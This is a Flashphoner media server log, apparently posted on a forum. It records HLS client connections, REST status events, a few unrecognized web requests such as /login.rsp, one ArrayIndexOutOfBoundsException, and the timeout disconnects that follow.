06:52:06,014 INFO           WCS4Handler - HLS-HTTP-pool-22-thread-254 onConnect client: com.flashphoner.server.H.H@36e40fa5; params: Connection{sipRegisterRequired=null, sipLogin='null', sipAuthenticationName='null', sipPassword='null', sipVisibleName='null', sipDomain='null', sipOutboundProxy='null', sipPort=null, sipContactParams='null', width=640, height=480, supportedResolutions='null', useDTLS=null, mediaProviders=[HLS], appMainClass='null', authToken='null', status='null', restClientConfig=null, clientVersion=null, keepAlive=false}Context{custom={aclAuth=null}, nodeId='null', appKey='null', sessionId='null'}
06:52:06,458 INFO            RestClient - HLS-HTTP-pool-22-thread-254 SEND REST OBJECT ==>
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "-HLS",
  "width" : 640,
  "height" : 480,
  "useWsTunnel" : false,
  "useWsTunnelPacketization2" : false,
  "msePacketizationVersion" : 1,
  "useBase64BinaryEncoding" : false,
  "mediaProviders" : [ "HLS" ],
  "authToken" : "-HLS",
  "status" : "ESTABLISHED",
  "keepAlive" : false,
  "aclAuth" : null
}
06:52:06,711 INFO         RestApiRouter - HTTP-pool-3-thread-182 Use controller class com.flashphoner.rest.server.apps.echo_apps.EchoApp with path /apps/EchoApp/ConnectionStatusEvent
06:52:06,776 INFO               EchoApp - HTTP-pool-3-thread-182 handleRequest method: ConnectionStatusEvent params:{nodeId=Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168, appKey=defaultApp, sessionId=-HLS, width=640, height=480, useWsTunnel=false, useWsTunnelPacketization2=false, msePacketizationVersion=1, useBase64BinaryEncoding=false, mediaProviders=[HLS], authToken=-HLS, status=ESTABLISHED, keepAlive=false, aclAuth=null}
06:52:06,858 INFO            RestClient - HLS-HTTP-pool-22-thread-254 content -> {"nodeId":"Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168","appKey":"defaultApp","sessionId":"-HLS","width":640,"height":480,"useWsTunnel":false,"useWsTunnelPacketization2":false,"msePacketizationVersion":1,"useBase64BinaryEncoding":false,"mediaProviders":["HLS"],"authToken":"-HLS","status":"ESTABLISHED","keepAlive":false,"aclAuth":null}
06:52:06,899 INFO            RestClient - HLS-HTTP-pool-22-thread-254 RECEIVED REST OBJECT <==
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "-HLS",
  "width" : 640,
  "height" : 480,
  "useWsTunnel" : false,
  "useWsTunnelPacketization2" : false,
  "msePacketizationVersion" : 1,
  "useBase64BinaryEncoding" : false,
  "mediaProviders" : [ "HLS" ],
  "authToken" : "-HLS",
  "status" : "ESTABLISHED",
  "keepAlive" : false,
  "aclAuth" : null
}
06:52:06,931 INFO           WCS4Handler - HLS-HTTP-pool-22-thread-254 Connected client: ClientConfig{rtspMedia=falsertmpAgent=false, wsTunnel=false, login='rggrijltmdo6o47bekhke6fhbu', authenticationName='null', password='null', domain='null', outboundProxy='null', port=0, visibleName='null', regRequired=false, applicationName='null', swfUrl='null', qValue='null', pAssociatedUri='null', contactParams='null', authDate=Mon Feb 05 06:52:06 EST 2024, authToken='-HLS', logsFolderName='null', clientVersion='null', clientOSVersion='null', clientBrowserVersion='null', wsTunnelPacketization2='false', custom='{aclAuth=null}'}
06:52:06,931 INFO     HLSStreamProvider - HLS-HTTP-pool-22-thread-254 HLS connected to server, id:-HLS
06:52:06,940 WARN      HLSServerHandler - HLS-HTTP-pool-22-thread-254 Unrecognized request /favicon.ico
06:52:08,006 INFO           WCS4Handler - HLS-HTTP-pool-22-thread-32 onConnect client: com.flashphoner.server.H.H@6855dcf; params: Connection{sipRegisterRequired=null, sipLogin='null', sipAuthenticationName='null', sipPassword='null', sipVisibleName='null', sipDomain='null', sipOutboundProxy='null', sipPort=null, sipContactParams='null', width=640, height=480, supportedResolutions='null', useDTLS=null, mediaProviders=[HLS], appMainClass='null', authToken='null', status='null', restClientConfig=null, clientVersion=null, keepAlive=false}Context{custom={aclAuth=null}, nodeId='null', appKey='null', sessionId='null'}
06:52:08,010 INFO            RestClient - HLS-HTTP-pool-22-thread-32 SEND REST OBJECT ==>
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "image-HLS",
  "width" : 640,
  "height" : 480,
  "useWsTunnel" : false,
  "useWsTunnelPacketization2" : false,
  "msePacketizationVersion" : 1,
  "useBase64BinaryEncoding" : false,
  "mediaProviders" : [ "HLS" ],
  "authToken" : "image-HLS",
  "status" : "ESTABLISHED",
  "keepAlive" : false,
  "aclAuth" : null
}
06:52:08,022 INFO         RestApiRouter - HTTP-pool-3-thread-101 Use controller class com.flashphoner.rest.server.apps.echo_apps.EchoApp with path /apps/EchoApp/ConnectionStatusEvent
06:52:08,023 INFO               EchoApp - HTTP-pool-3-thread-101 handleRequest method: ConnectionStatusEvent params:{nodeId=Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168, appKey=defaultApp, sessionId=image-HLS, width=640, height=480, useWsTunnel=false, useWsTunnelPacketization2=false, msePacketizationVersion=1, useBase64BinaryEncoding=false, mediaProviders=[HLS], authToken=image-HLS, status=ESTABLISHED, keepAlive=false, aclAuth=null}
06:52:08,025 INFO            RestClient - HLS-HTTP-pool-22-thread-32 content -> {"nodeId":"Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168","appKey":"defaultApp","sessionId":"image-HLS","width":640,"height":480,"useWsTunnel":false,"useWsTunnelPacketization2":false,"msePacketizationVersion":1,"useBase64BinaryEncoding":false,"mediaProviders":["HLS"],"authToken":"image-HLS","status":"ESTABLISHED","keepAlive":false,"aclAuth":null}
06:52:08,025 INFO            RestClient - HLS-HTTP-pool-22-thread-32 RECEIVED REST OBJECT <==
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "image-HLS",
  "width" : 640,
  "height" : 480,
  "useWsTunnel" : false,
  "useWsTunnelPacketization2" : false,
  "msePacketizationVersion" : 1,
  "useBase64BinaryEncoding" : false,
  "mediaProviders" : [ "HLS" ],
  "authToken" : "image-HLS",
  "status" : "ESTABLISHED",
  "keepAlive" : false,
  "aclAuth" : null
}
06:52:08,025 INFO           WCS4Handler - HLS-HTTP-pool-22-thread-32 Connected client: ClientConfig{rtspMedia=falsertmpAgent=false, wsTunnel=false, login='243qk1a89cokq4095p8s58c4gk', authenticationName='null', password='null', domain='null', outboundProxy='null', port=0, visibleName='null', regRequired=false, applicationName='null', swfUrl='null', qValue='null', pAssociatedUri='null', contactParams='null', authDate=Mon Feb 05 06:52:08 EST 2024, authToken='image-HLS', logsFolderName='null', clientVersion='null', clientOSVersion='null', clientBrowserVersion='null', wsTunnelPacketization2='false', custom='{aclAuth=null}'}
06:52:08,025 INFO     HLSStreamProvider - HLS-HTTP-pool-22-thread-32 HLS connected to server, id:image-HLS
06:52:08,025 WARN      HLSServerHandler - HLS-HTTP-pool-22-thread-32 Unrecognized request /image/lgbg.jpg
06:52:08,133 INFO           WCS4Handler - HLS-HTTP-pool-22-thread-308 onConnect client: com.flashphoner.server.H.H@73f37de; params: Connection{sipRegisterRequired=null, sipLogin='null', sipAuthenticationName='null', sipPassword='null', sipVisibleName='null', sipDomain='null', sipOutboundProxy='null', sipPort=null, sipContactParams='null', width=640, height=480, supportedResolutions='null', useDTLS=null, mediaProviders=[HLS], appMainClass='null', authToken='null', status='null', restClientConfig=null, clientVersion=null, keepAlive=false}Context{custom={aclAuth=null}, nodeId='null', appKey='null', sessionId='null'}
06:52:08,136 INFO            RestClient - HLS-HTTP-pool-22-thread-308 SEND REST OBJECT ==>
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "images-HLS",
  "width" : 640,
  "height" : 480,
  "useWsTunnel" : false,
  "useWsTunnelPacketization2" : false,
  "msePacketizationVersion" : 1,
  "useBase64BinaryEncoding" : false,
  "mediaProviders" : [ "HLS" ],
  "authToken" : "images-HLS",
  "status" : "ESTABLISHED",
  "keepAlive" : false,
  "aclAuth" : null
}
06:52:08,166 INFO         RestApiRouter - HTTP-pool-3-thread-183 Use controller class com.flashphoner.rest.server.apps.echo_apps.EchoApp with path /apps/EchoApp/ConnectionStatusEvent
06:52:08,168 INFO               EchoApp - HTTP-pool-3-thread-183 handleRequest method: ConnectionStatusEvent params:{nodeId=Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168, appKey=defaultApp, sessionId=images-HLS, width=640, height=480, useWsTunnel=false, useWsTunnelPacketization2=false, msePacketizationVersion=1, useBase64BinaryEncoding=false, mediaProviders=[HLS], authToken=images-HLS, status=ESTABLISHED, keepAlive=false, aclAuth=null}
06:52:08,169 INFO            RestClient - HLS-HTTP-pool-22-thread-308 content -> {"nodeId":"Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168","appKey":"defaultApp","sessionId":"images-HLS","width":640,"height":480,"useWsTunnel":false,"useWsTunnelPacketization2":false,"msePacketizationVersion":1,"useBase64BinaryEncoding":false,"mediaProviders":["HLS"],"authToken":"images-HLS","status":"ESTABLISHED","keepAlive":false,"aclAuth":null}
06:52:08,170 INFO            RestClient - HLS-HTTP-pool-22-thread-308 RECEIVED REST OBJECT <==
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "images-HLS",
  "width" : 640,
  "height" : 480,
  "useWsTunnel" : false,
  "useWsTunnelPacketization2" : false,
  "msePacketizationVersion" : 1,
  "useBase64BinaryEncoding" : false,
  "mediaProviders" : [ "HLS" ],
  "authToken" : "images-HLS",
  "status" : "ESTABLISHED",
  "keepAlive" : false,
  "aclAuth" : null
}
06:52:08,171 INFO           WCS4Handler - HLS-HTTP-pool-22-thread-308 Connected client: ClientConfig{rtspMedia=falsertmpAgent=false, wsTunnel=false, login='q3nqalid51g0ke2npdrbcq90e3', authenticationName='null', password='null', domain='null', outboundProxy='null', port=0, visibleName='null', regRequired=false, applicationName='null', swfUrl='null', qValue='null', pAssociatedUri='null', contactParams='null', authDate=Mon Feb 05 06:52:08 EST 2024, authToken='images-HLS', logsFolderName='null', clientVersion='null', clientOSVersion='null', clientBrowserVersion='null', wsTunnelPacketization2='false', custom='{aclAuth=null}'}
06:52:08,171 INFO     HLSStreamProvider - HLS-HTTP-pool-22-thread-308 HLS connected to server, id:images-HLS
06:52:08,171 WARN      HLSServerHandler - HLS-HTTP-pool-22-thread-308 Unrecognized request /skin/default_1/images/logo.png
06:52:08,482 ERROR     HLSServerHandler - HLS-HTTP-pool-22-thread-163 HTTP error
java.lang.ArrayIndexOutOfBoundsException
06:52:08,695 WARN      HLSServerHandler - HLS-HTTP-pool-22-thread-254 Unrecognized request /login.rsp
06:57:08,304 INFO      HLSStreamManager - HLSStreamProviderKeepaliveThread-83 Closing by timeout HLSStreamProvider, id:image-HLS
06:57:08,335 INFO           WCS4Handler - DISCONNECT-CLIENT-pool-6-thread-666 Disconnect client: com.flashphoner.server.client.MediaWCSClient@2c21d508
06:57:08,338 INFO           WCS4Handler - DISCONNECT-CLIENT-pool-6-thread-666 
[-- BEGIN CLIENT LOG --]
CONF: ClientConfig{rtspMedia=falsertmpAgent=false, wsTunnel=false, login='243qk1a89cokq4095p8s58c4gk', authenticationName='null', password='null', domain='null', outboundProxy='null', port=0, visibleName='null', regRequired=false, applicationName='null', swfUrl='null', qValue='null', pAssociatedUri='null', contactParams='null', authDate=Mon Feb 05 06:52:08 EST 2024, authToken='image-HLS', logsFolderName='null', clientVersion='null', clientOSVersion='null', clientBrowserVersion='null', wsTunnelPacketization2='false', custom='{aclAuth=null}'}
IMPL: com.flashphoner.server.H.H@6855dcf
LOGS:
Client didn't pushed logs to server, try to enable push_log at client side.
[-- END CLIENT LOG ----]
06:57:08,345 INFO           WCS4Handler - DISCONNECT-CLIENT-pool-6-thread-666 Report client-243qk1a89cokq4095p8s58c4gk-2024.02.05.06.57.08-1707134228340.report is submitted
06:57:08,415 INFO            RestClient - API-ASYNC-pool-7-thread-669 SEND REST OBJECT ==>
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "image-HLS",
  "status" : "DISCONNECTED"
}
06:57:08,421 INFO      HLSStreamManager - HLSStreamProviderKeepaliveThread-83 Removed com.flashphoner.server.H.H@6855dcf by stream name image
06:57:08,421 INFO      HLSStreamManager - HLSStreamProviderKeepaliveThread-83 Closing by timeout HLSStreamProvider, id:images-HLS
06:57:08,439 INFO           WCS4Handler - DISCONNECT-CLIENT-pool-6-thread-667 Disconnect client: com.flashphoner.server.client.MediaWCSClient@272deb51
06:57:08,440 INFO           WCS4Handler - DISCONNECT-CLIENT-pool-6-thread-667 
[-- BEGIN CLIENT LOG --]
CONF: ClientConfig{rtspMedia=falsertmpAgent=false, wsTunnel=false, login='q3nqalid51g0ke2npdrbcq90e3', authenticationName='null', password='null', domain='null', outboundProxy='null', port=0, visibleName='null', regRequired=false, applicationName='null', swfUrl='null', qValue='null', pAssociatedUri='null', contactParams='null', authDate=Mon Feb 05 06:52:08 EST 2024, authToken='images-HLS', logsFolderName='null', clientVersion='null', clientOSVersion='null', clientBrowserVersion='null', wsTunnelPacketization2='false', custom='{aclAuth=null}'}
IMPL: com.flashphoner.server.H.H@73f37de
LOGS:
Client didn't pushed logs to server, try to enable push_log at client side.
[-- END CLIENT LOG ----]
06:57:08,440 INFO           WCS4Handler - DISCONNECT-CLIENT-pool-6-thread-667 Report client-q3nqalid51g0ke2npdrbcq90e3-2024.02.05.06.57.08-1707134228440.report is submitted
06:57:08,457 INFO      HLSStreamManager - HLSStreamProviderKeepaliveThread-83 Removed com.flashphoner.server.H.H@73f37de by stream name images
06:57:08,466 INFO            RestClient - API-ASYNC-pool-7-thread-670 SEND REST OBJECT ==>
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "images-HLS",
  "status" : "DISCONNECTED"
}
06:57:08,516 INFO         RestApiRouter - HTTP-pool-3-thread-182 Use controller class com.flashphoner.rest.server.apps.echo_apps.EchoApp with path /apps/EchoApp/ConnectionStatusEvent
06:57:08,518 INFO               EchoApp - HTTP-pool-3-thread-182 handleRequest method: ConnectionStatusEvent params:{nodeId=Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168, appKey=defaultApp, sessionId=images-HLS, status=DISCONNECTED}
06:57:08,522 INFO            RestClient - API-ASYNC-pool-7-thread-670 content -> {"nodeId":"Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168","appKey":"defaultApp","sessionId":"images-HLS","status":"DISCONNECTED"}
06:57:08,529 INFO            RestClient - API-ASYNC-pool-7-thread-670 RECEIVED REST OBJECT <==
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "images-HLS",
  "status" : "DISCONNECTED"
}
06:57:08,531 INFO         RestApiRouter - HTTP-pool-3-thread-349 Use controller class com.flashphoner.rest.server.apps.echo_apps.EchoApp with path /apps/EchoApp/ConnectionStatusEvent
06:57:08,533 INFO               EchoApp - HTTP-pool-3-thread-349 handleRequest method: ConnectionStatusEvent params:{nodeId=Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168, appKey=defaultApp, sessionId=image-HLS, status=DISCONNECTED}
06:57:08,536 INFO            RestClient - API-ASYNC-pool-7-thread-669 content -> {"nodeId":"Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168","appKey":"defaultApp","sessionId":"image-HLS","status":"DISCONNECTED"}
06:57:08,536 INFO            RestClient - API-ASYNC-pool-7-thread-669 RECEIVED REST OBJECT <==
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "image-HLS",
  "status" : "DISCONNECTED"
}
06:57:28,457 INFO      HLSStreamManager - HLSStreamProviderKeepaliveThread-83 Closing by timeout HLSStreamProvider, id:-HLS
06:57:28,461 INFO           WCS4Handler - DISCONNECT-CLIENT-pool-6-thread-666 Disconnect client: com.flashphoner.server.client.MediaWCSClient@26d9be78
06:57:28,461 INFO           WCS4Handler - DISCONNECT-CLIENT-pool-6-thread-666 
[-- BEGIN CLIENT LOG --]
CONF: ClientConfig{rtspMedia=falsertmpAgent=false, wsTunnel=false, login='rggrijltmdo6o47bekhke6fhbu', authenticationName='null', password='null', domain='null', outboundProxy='null', port=0, visibleName='null', regRequired=false, applicationName='null', swfUrl='null', qValue='null', pAssociatedUri='null', contactParams='null', authDate=Mon Feb 05 06:52:06 EST 2024, authToken='-HLS', logsFolderName='null', clientVersion='null', clientOSVersion='null', clientBrowserVersion='null', wsTunnelPacketization2='false', custom='{aclAuth=null}'}
IMPL: com.flashphoner.server.H.H@36e40fa5
LOGS:
Client didn't pushed logs to server, try to enable push_log at client side.
[-- END CLIENT LOG ----]
06:57:28,463 INFO           WCS4Handler - DISCONNECT-CLIENT-pool-6-thread-666 Report client-rggrijltmdo6o47bekhke6fhbu-2024.02.05.06.57.28-1707134248462.report is submitted
06:57:28,465 INFO            RestClient - API-ASYNC-pool-7-thread-670 SEND REST OBJECT ==>
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "-HLS",
  "status" : "DISCONNECTED"
}
06:57:28,512 INFO         RestApiRouter - HTTP-pool-3-thread-101 Use controller class com.flashphoner.rest.server.apps.echo_apps.EchoApp with path /apps/EchoApp/ConnectionStatusEvent
06:57:28,514 INFO               EchoApp - HTTP-pool-3-thread-101 handleRequest method: ConnectionStatusEvent params:{nodeId=Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168, appKey=defaultApp, sessionId=-HLS, status=DISCONNECTED}
06:57:28,515 INFO            RestClient - API-ASYNC-pool-7-thread-670 content -> {"nodeId":"Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168","appKey":"defaultApp","sessionId":"-HLS","status":"DISCONNECTED"}
06:57:28,515 INFO            RestClient - API-ASYNC-pool-7-thread-670 RECEIVED REST OBJECT <==
URL:http://localhost:8081/apps/EchoApp/ConnectionStatusEvent
OBJECT:
{
  "nodeId" : "Rs89OeJE6aVMLevj6HcsN1C0cWIKwIqM@45.252.249.168",
  "appKey" : "defaultApp",
  "sessionId" : "-HLS",
  "status" : "DISCONNECTED"
}
06:57:28,519 INFO      HLSStreamManager - HLSStreamProviderKeepaliveThread-83 Removed com.flashphoner.server.H.H@36e40fa5 by stream name 

ZeroDay Forums Mini